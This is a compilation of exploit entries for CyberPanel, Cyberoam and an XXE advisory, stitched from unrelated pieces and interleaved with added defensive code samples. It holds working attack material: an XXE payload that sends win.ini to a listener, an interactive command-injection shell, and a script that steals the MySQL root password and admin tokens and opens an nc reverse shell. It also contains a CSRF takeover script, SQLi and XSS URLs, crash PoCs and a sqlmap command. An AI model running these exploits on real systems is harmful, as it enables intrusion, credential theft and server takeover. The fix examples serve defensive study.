MacOS X 10.6
Jetty(7.5.0.v20110901)
Java/1.8.0_91-b14
SimpleHTTP/0.6 Python/2.7.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php
22.06.2016
--
C:\data\xxe.xml:
----------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">
Request:
--------
POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>
Response:
---------
C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
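As an added example (not part of the Zero Science advisory or the vendor's code), a pre-parse check for the body shown above: it refuses any document carrying a DOCTYPE, which removes the parameter-entity mechanism the advisory relies on, and only then reports the element names. The request text is the advisory's with the listener host replaced by a placeholder; nothing is fetched.

```python
import xml.parsers.expat

# The request body from the advisory above, with the listener host replaced by a
# placeholder (constructed copy for offline testing; nothing is fetched).
XXE_REQUEST = """<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://oob-listener.invalid:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>"""

# The same inquiry with no DTD: what a legitimate client sends (constructed).
BENIGN_REQUEST = """<?xml version="1.0" encoding="UTF-8" ?>
<ppbe><target><command>action.notification.recipient.present</command></target><inquire /></ppbe>"""


class DtdRejected(ValueError):
    pass


def parse_without_dtd(data):
    """Parse data with expat, failing on any DOCTYPE, and return the element names seen.

    Rejecting the DOCTYPE outright removes every entity mechanism (internal,
    external and parameter entities); the inquiry format needs none of them."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE '{name}' is not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    # Defence in depth: never expand external parameter entities even if a DTD were allowed.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(data, True)
    return seen


def is_acceptable(data):
    """True when the body parses with no DOCTYPE; False when it must be dropped."""
    try:
        parse_without_dtd(data)
        return True
    except (DtdRejected, xml.parsers.expat.ExpatError):
        return False


if __name__ == "__main__":
    print("advisory body accepted:", is_acceptable(XXE_REQUEST))
    print("benign body accepted:", is_acceptable(BENIGN_REQUEST), parse_without_dtd(BENIGN_REQUEST))
```

In the Java code listed above the equivalent is to stop handing a raw InputStream to the JAXB unmarshaller and instead unmarshal from an XMLStreamReader created by an XMLInputFactory with `XMLInputFactory.SUPPORT_DTD` set to false (and `IS_SUPPORTING_EXTERNAL_ENTITIES` to false), so the DOCTYPE in the request is never processed.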
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/
#!/usr/bin/python3
import argparse
import httpx
import sys

RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"

print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
print()

allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]

parser = argparse.ArgumentParser()
parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
args = parser.parse_args()

if args.endpoint not in allowed_endpoints:
    print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
    parser.print_help()
    sys.exit(1)

target = args.target
endpoint = args.endpoint

client = httpx.Client(base_url=target, verify=False)

try:
    response = client.get("/")
    response.raise_for_status()
except httpx.RequestError:
    print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}")
    sys.exit(1)

def get_token():
    response = client.get("/")
    return response.cookies.get("csrftoken")

def rce(client, csrf_token, cmd, endpoint):
    headers = {
        "X-CSRFToken": csrf_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    payload = '{"statusfile": "; %s; #"}' % cmd
    response = client.request("OPTIONS", endpoint, headers=headers, data=payload)
    return response.json().get("requestStatus")

csrf_token = get_token()
if not csrf_token:
    print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
    sys.exit(1)

while True:
    cmd = input(f"{YELLOW}$> {RESET}")
    print(rce(client, csrf_token, cmd, endpoint))
# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 27.08.2021
# Author: Numan Türle
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: <=2.1
# https://www.youtube.com/watch?v=J_8iLELVgkE
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# CyberPanel - Remote Code Execution (Authenticated)
# author: twitter.com/numanturle
# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password

import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
warnings.simplefilter('ignore',InsecureRequestWarning)

def init():
    parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    parser.add_argument('-l', '--login',help='Username', type=str, required=True)
    parser.add_argument('-p', '--password',help='Password', type=str, required=True)
    parser.add_argument('-f', '--file',help='File', type=str)
    args = parser.parse_args()
    exploit(args)

def exploit(args):
    def on_open(ws):
        verifyPath,socket_password
        print("[+] Socket connection successful")
        print("[+] Trying a reverse connection")
        ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}}))
        ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password}))
        ws.close()

    def on_close(ws, close_status_code, close_msg):
        print("[+] Successful")
        print("[!] Disconnect from socket")

    session = requests.Session()
    target = "https://{}:8090".format(args.host)
    username = args.login
    password = args.password
    print("[+] Target {}".format(target))
    response = session.get(target, verify=False)
    session_hand = session.cookies.get_dict()
    token = session_hand["csrftoken"]
    print("[+] Token {}".format(token))
    headers = {
        'X-Csrftoken': token,
        'Cookie': 'csrftoken={}'.format(token),
        'Referer': target
    }
    login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"})
    login_json = json.loads(login.content)
    if login_json["loginStatus"]:
        session_hand_login = session.cookies.get_dict()
        print("[+] Login Success")
        print("[+] Send request fetch websites list")
        headers = {
            'X-Csrftoken': session_hand_login["csrftoken"],
            'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
            'Referer': target
        }
        feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10})
        feth_weblist_json = json.loads(feth_weblist.content)
        if feth_weblist_json["data"]:
            weblist_json = json.loads(feth_weblist_json["data"])
            domain = weblist_json[0]["domain"]
            domain_folder = "/home/{}".format(domain)
            print("[+] Successfully {} selected".format(domain))
            print("[+] Creating ssh pub")
            remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1})
            create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
            create_ssh_json = json.loads(create_ssh.content)
            if create_ssh_json["status"]:
                key = create_ssh_json["deploymentKey"]
                print("[+] Key : {}".format(key))
                explode_key = key.split()
                explode_username = explode_key[-1].split("@")
                if explode_username[0]:
                    username = explode_username[0]
                    hostname = explode_username[1]
                    print("[+] {} username selected".format(username))
                    print("[+] Preparing for symlink attack")
                    print("[+] Attempting symlink attack with user-level command execution vulnerability #1")
                    target_file = args.file
                    if not target_file:
                        target_file = "/root/.my.cnf"
                    domain_folder_ssh = "{}/.ssh".format(domain_folder)
                    command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username)
                    completeStartingPath = "{}';{};'".format(domain_folder,command)
                    #filemanager/controller - completeStartingPath - command execution vulnerability
                    symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
                    symlink_json = json.loads(symlink.content)
                    if symlink_json["status"]:
                        print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file))
                        read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
                        read_file_json = json.loads(read_file.content)
                        read_file = read_file_json["deploymentKey"]
                        if not args.file:
                            print("-----------------------------------")
                            print(read_file.strip())
                            print("-----------------------------------")
                            mysql_password = re.findall('password=\"(.*?)\"',read_file)[0]
                            steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder)
                            print("[+] Fetching users tokens")
                            completeStartingPath = "{}';{}".format(domain_folder,steal_token)
                            steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
                            token_file = domain_folder+"/token.txt"
                            steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain})
                            leak = json.loads(steal_token_read_request.content)
                            leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:]
                            print("------------------------------")
                            for user in leak:
                                b64de = base64.b64decode(user).decode('utf-8')
                                exp_username = b64de.split(":")
                                if exp_username[0] == "admin":
                                    admin_password = exp_username[1]
                                print("[+] " + b64de)
                            print("------------------------------")
                            print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
                            print("[+] Try login admin")
                            headers = {
                                'X-Csrftoken': token,
                                'Cookie': 'csrftoken={}'.format(token),
                                'Referer': target
                            }
                            login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"})
                            login_json = json.loads(login_admin.content)
                            if login_json["loginStatus"]:
                                session_hand_login = session.cookies.get_dict()
                                print("[+] 4dm1n_l061n_5ucc355")
                                print("[+] c0nn3c71n6_70_73rm1n4l")
                                headers = {
                                    'X-Csrftoken': session_hand_login["csrftoken"],
                                    'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
                                    'Referer': target
                                }
                                get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False)
                                verifyPath = re.findall('id=\"verifyPath\">(.*?)</div>',str(get_websocket_token.content))[-1]
                                socket_password = re.findall('id=\"password\">(.*?)</div>',str(get_websocket_token.content))[-1]
                                print("[+] verifyPath {}".format(verifyPath))
                                print("[+] socketPassword {}".format(socket_password))
                                print("[+] Trying to connect to socket")
                                ws = websocket.WebSocketApp("wss://{}:5678".format(args.host),
                                                            on_open=on_open,
                                                            on_close=on_close)
                                ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
                            else:
                                print("[-] Auto admin login failed")
                        else:
                            print(read_file)
                    else:
                        print("[-] Unexpected")
                else:
                    print("[-] Username selected failed")
            else:
                print("[-] Fail ssh pub")
        else:
            print("[-] List error")
    else:
        print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"]))

if __name__ == "__main__":
    init()
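Both CyberPanel issues above share one root cause: a JSON field (statusfile in 2.3.x, completeStartingPath in 2.1) is concatenated into a shell command. The following added example (not CyberPanel's code) shows the corrected pattern: validate that the value names a path under an allowed directory, then use it only as a path or as a single argv element, never through a shell. The base directory, file names and helper names are constructed for illustration.

```python
import pathlib
import subprocess
import tempfile


class BadPath(ValueError):
    """Raised for any caller-supplied value that does not name a location under the base directory."""


def resolve_under(base_dir, user_supplied):
    """Resolve user_supplied relative to base_dir and require the result to stay inside it.

    The value is only ever used as a filesystem path, never interpolated into a
    shell string, so characters such as ; ' and # have no special meaning here."""
    base = pathlib.Path(base_dir).resolve()
    target = (base / user_supplied).resolve()      # an absolute input replaces base and is caught below
    if target != base and base not in target.parents:
        raise BadPath(user_supplied)
    return target


def read_status_file(base_dir, statusfile):
    """Replacement for a shell-built 'cat <statusfile>': open the validated file directly."""
    path = resolve_under(base_dir, statusfile)
    if not path.is_file():
        raise BadPath(statusfile)
    return path.read_text()


def list_directory(base_dir, starting_path):
    """Replacement for a shell-built 'ls <path>': the validated path is one argv element
    and there is no shell=True, so the argument cannot terminate or extend the command."""
    path = resolve_under(base_dir, starting_path)
    if not path.is_dir():
        raise BadPath(starting_path)
    proc = subprocess.run(["ls", "-1", str(path)], capture_output=True, text=True, check=True)
    return sorted(proc.stdout.split())


def demo():
    """Build a scratch tree (constructed) and exercise the handlers with the input
    shapes seen in the two advisories plus plain traversal."""
    base = tempfile.mkdtemp()
    (pathlib.Path(base) / "status.txt").write_text("done\n")
    results = {"benign": read_status_file(base, "status.txt").strip()}
    for hostile in ("; id; #", "status.txt'; id; '", "../../etc/passwd", "/etc/passwd"):
        try:
            read_status_file(base, hostile)
            results[hostile] = "allowed"
        except BadPath:
            results[hostile] = "rejected"
    results["listing"] = list_directory(base, ".")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value}")
```

Two details carry the fix: `resolve()` is applied to both the base and the candidate before comparing, so symlinked temp directories and `..` segments are judged on the real path, and `subprocess.run` receives a list, so the only thing the caller controls is the text of one argument. Where the original code shelled out to read a file, not shelling out at all (`read_text`) is the simpler replacement.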
# Title: CyberPanel Administrator Account Takeover <= v1.8.4
# Date: 30.06.2019
# Author: Bilgi Birikim Sistemleri
# Vendor Homepage: https://cyberpanel.net/
# Version: Up to v1.8.4.
# CVE: CVE-2019-13056
# mturkyilmaz@bilgibirikim.com & bilgibirikim.com
# Description:
# Attacker can edit administrator's credentials like email, password.
# Then, access the administration panel and takeover the server.
# A CSRF vulnerability.
# How to Reproduce:
# Attacker will create a website,
# CyberPanel administrator will visit that website,
# Administrator's e-mail and password will be changed automatically.
# PoC:
<script>
fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"attackersemail@example.org","password":"attackerspassword"}'});
</script>
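Added example (not CyberPanel's code) of the server-side checks that would make the request in the PoC above fail: require a JSON Content-Type, verify Origin/Referer against the site's own origin, and bind a token to the session. TRUSTED_ORIGIN and the function names are assumptions made for this example.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Hypothetical origin of the panel; the PoC reaches the server on port 8090.
TRUSTED_ORIGIN = "https://panel.example.org:8090"


def issue_token(session):
    """Generate a per-session token; the server keeps it in the session and the
    page embeds it so the legitimate front end can send it back in X-CSRFToken."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def check_state_change(session, headers):
    """Return (allowed, reason) for a state-changing request.

    Three independent checks, each of which the cross-site fetch in the PoC fails:
    1. Content-Type must be application/json: a cross-origin fetch cannot send it
       without a CORS preflight, whereas text/plain goes through unchallenged.
    2. Origin (or Referer as fallback) must match this site.
    3. X-CSRFToken must equal the session's token (constant-time compare)."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, f"unexpected Content-Type {ctype!r}"
    source = h.get("origin") or h.get("referer")
    if not source:
        return False, "missing Origin and Referer"
    s, t = urlparse(source), urlparse(TRUSTED_ORIGIN)
    if (s.scheme, s.hostname, s.port) != (t.scheme, t.hostname, t.port):
        return False, f"cross-site request from {source}"
    expected = session.get("csrf_token")
    supplied = h.get("x-csrftoken", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or wrong CSRF token"
    return True, "ok"


def demo():
    """Run the PoC's request shape and a legitimate request through the checks."""
    session = {}
    token = issue_token(session)
    # Shape of the PoC request: cookie-authenticated, text/plain body, foreign origin, no token.
    cross_site = {"Content-Type": "text/plain", "Origin": "https://attacker.invalid"}
    # What the panel's own JavaScript would send.
    legitimate = {"Content-Type": "application/json", "Origin": TRUSTED_ORIGIN, "X-CSRFToken": token}
    return check_state_change(session, cross_site), check_state_change(session, legitimate)


if __name__ == "__main__":
    print(demo())
```

The three checks are deliberately redundant: the Content-Type rule alone stops the simple fetch in the PoC, the origin rule stops it even if a JSON body were accepted, and the token rule does not depend on the browser sending any header at all. Issuing the session cookie with `SameSite=Lax` adds a fourth layer that keeps the cookie out of cross-site POSTs entirely.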
source: https://www.securityfocus.com/bid/51143/info
Cyberoam UTM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/corporate/Controller?mode=301&tableid=[SQL]&sort=&dir=
source: https://www.securityfocus.com/bid/48814/info
Cyberoam UTM is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?srcip=<script>alert(document.cookie)</script>
#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
#Tested Version: 2.1.2.5
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ctas_nn_2.1.2.5.py
#2.- Open ctas_nn_2.1.2.5.txt and copy content to clipboard
#3.- Open Cyberoam Transparent Authentication Suite
#4.- Select General > in Domain Type select "Microsoft Active Directory"
#5.- In "NetBIOS Name" Paste Clipboard
#6.- Click on "Apply"
#7.- Crashed!
cod = "\x41" * 1500
f = open('ctas_nn_2.1.2.5.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
#Tested Version: 2.1.2.5
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ctas_fqdn_2.1.2.5.py
#2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard
#3.- Open Cyberoam Transparent Authentication Suite
#4.- Select General > in Domain Type select "Microsoft Active Directory"
#5.- In "Fully Qualified Domain Name" paste Clipboard
#6.- Click on "Apply"
#7.- Crashed!
cod = "\x41" * 1000
f = open('ctas_fqdn_2.1.2.5.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
#Tested Version: 1.3.1.30
#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: c_sslvpn_http.py
#2.- Open c_sslvpn_http.txt and copy content to clipboard
#3.- Open Cyberoam SSLVPN Client
#4.- Select Proxy Settings > Enable "Manual Configuration"
#5.- In "HTTP Proxy" address field paste Clipboard
#6.- In "Port" type 80
#7.- Select "OK"
#8.- Crashed!
cod = "\x41" * 5000
f = open('c_sslvpn_http.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
#Tested Version: 1.3.1.30
#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: c_sslvpn_cts.py
#2.- Open c_sslvpn_cts.txt and copy content to clipboard
#3.- Open Cyberoam SSLVPN Client
#4.- Select Server Settings
#5.- In "Connect To Server" field paste Clipboard
#6.- In "Port" type 80
#7.- Select "OK"
#8.- Crashed!
cod = "\x41" * 5000
f = open('c_sslvpn_cts.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip
#Tested Version: 2.1.2.7
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: cgac_2.1.2.7.py
#2.- Open cgac_2.1.2.7.txt and copy content to clipboard
#3.- Open Cyberoam General Authentication Client
#4.- In "Server Address" field paste Clipboard
#5.- Click on "Test"
#6.- Crashed!
cod = "\x41" * 256
f = open('cgac_2.1.2.7.txt', 'w')
f.write(cod)
f.close()
# Exploit Title: Cyberoam : Blind SQL Injection
# Date: 31/Aug/2015
# Exploit Author: Dharmendra Kumar Singh
# Contact: dsingh63@outlook.com
# Vendor Homepage: http://www.cyberoam.com
# Software Link: http://www.cyberoam.com/NGFW/
# Version: CR500iNG-XP - 10.6.2 MR-1
# Category: Firewall
1. Description
The username field in the captive portal of the Cyberoam NG firewall is vulnerable to SQL injection and can be exploited to execute SQL commands on the database.
The username field is vulnerable to the following types of SQL injection:
a) Boolean-based blind sql injection
b) Stacked queries
2. Proof of Concept
The data sent to the server while logging in through the captive portal looks like "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
The query generated on the backend server must be something like this:
SELECT password FROM table_name WHERE username = 'cyberuser'
a) Boolean-based blind sql injection
If a valid username/password combination is known, then boolean-based blind SQL injection can be done. If the username is set to cyberuser' AND 'x'='x , the data sent will be "mode=191&username=cyberuser' AND 'x'='x&password=cyberpass&a=1439886198757&producttype=0"
and the SQL query will become
SELECT password FROM table_name WHERE username = 'cyberuser' AND 'x'='x'
A successful login message will be received in response in this case. But if the username is set to cyberuser' AND 'x'='y then a login-failed message will be received in response, since x is not equal to y; this confirms that the username field is vulnerable to boolean-based blind SQL injection.
b) Stacked queries
If the username is set to cyberuser';SELECT PG_SLEEP(5) -- the resultant SQL query will become
SELECT password FROM table_name WHERE username = 'cyberuser';SELECT PG_SLEEP(5) -- '
The stacked SQL query "SELECT PG_SLEEP(5)" will make the current session's process sleep until 5 seconds have elapsed. This confirms that a PostgreSQL server is used and that stacked queries can be executed by providing crafted input to the username field.
3. Exploit
Since the techniques are blind, it is recommended to use an automated tool like SQLMap to exploit the vulnerability. The following command can be used to initiate the exploit:
sqlmap.py -u "http://example.com:8090/login.xml" --data "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
4. Solution
The backend server scripts do not sanitize user-supplied data before using it in the SQL query. Hence, by properly sanitizing the data received in the GET variable "username", the vulnerability can be patched.
5. Conclusion
The Cyberoam NG Firewall devices <= Version: CR500iNG-XP - 10.6.2 MR-1 are vulnerable to blind SQL injection, and this vulnerability can be exploited by an attacker to compromise the application and access or modify data.
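As an added example, not part of this advisory, the inferred query above is rebuilt two ways on an in-memory SQLite table (a constructed stand-in; the advisory does not name the real table): concatenated as the advisory infers, and with a bound parameter. `demo()` replays the advisory's two boolean probes against both, which is the fix the Solution section asks for, shown in code.

```python
import sqlite3


def make_portal_db():
    """In-memory stand-in for the portal's user table (constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE portal_users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO portal_users VALUES ('cyberuser', 'cyberpass')")
    conn.commit()
    return conn


def lookup_concatenated(conn, username):
    """The query shape the advisory infers: the username is pasted into the SQL text."""
    sql = "SELECT password FROM portal_users WHERE username = '%s'" % username
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_parameterized(conn, username):
    """Bound parameter: the driver passes the username as data, so quotes and AND
    clauses inside it are only ever compared against the column, never executed."""
    row = conn.execute("SELECT password FROM portal_users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None


def login(conn, username, password, lookup):
    """Portal-style check: fetch the stored password for the username and compare."""
    stored = lookup(conn, username)
    return stored is not None and stored == password


def demo():
    """Replay the advisory's probes; each value is (concatenated result, parameterized result)."""
    conn = make_portal_db()
    probes = {
        "plain": "cyberuser",
        "true": "cyberuser' AND 'x'='x",
        "false": "cyberuser' AND 'x'='y",
    }
    return {
        name: (login(conn, user, "cyberpass", lookup_concatenated),
               login(conn, user, "cyberpass", lookup_parameterized))
        for name, user in probes.items()
    }


if __name__ == "__main__":
    for name, (concat, param) in demo().items():
        print(f"{name:5}: concatenated={concat} parameterized={param}")
```

With the concatenated query the "true" probe logs in and the "false" probe does not, which is exactly the oracle the advisory describes; with the bound parameter both probes are simply unknown usernames. The stacked `PG_SLEEP` probe is not reproduced here because sqlite3's `execute()` refuses more than one statement per call; the parameterized form closes that path on PostgreSQL as well, since the input never becomes SQL text.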